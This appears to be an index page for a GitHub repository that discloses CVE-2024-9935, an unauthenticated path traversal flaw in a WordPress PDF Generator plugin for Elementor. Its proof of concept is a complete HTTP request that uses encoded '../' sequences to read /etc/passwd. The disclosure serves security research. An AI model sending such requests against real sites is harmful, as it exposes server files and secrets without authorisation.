https://github.com/randomrobbiebf/cve-2024-9935

PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download
https://github.com/randomrobbiebf/cve-2024-9935

Last synced: 3 months ago
JSON representation

PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download

• Host: GitHub
• URL: https://github.com/randomrobbiebf/cve-2024-9935
• Owner: RandomRobbieBF
• Created: 2024-11-18T10:14:45.000Z (over 1 year ago)
• Default Branch: main
• Last Pushed: 2024-11-18T10:15:49.000Z (over 1 year ago)
• Last Synced: 2025-12-31T06:44:12.611Z (5 months ago)
• Homepage:
• Size: 1.95 KB
• Stars: 2
• Watchers: 1
• Forks: 1
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# CVE-2024-9935

PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary File Download

# Description

The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.

# POC

```

GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1

Host: kubernetes.docker.internal

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Priority: u=0, i

```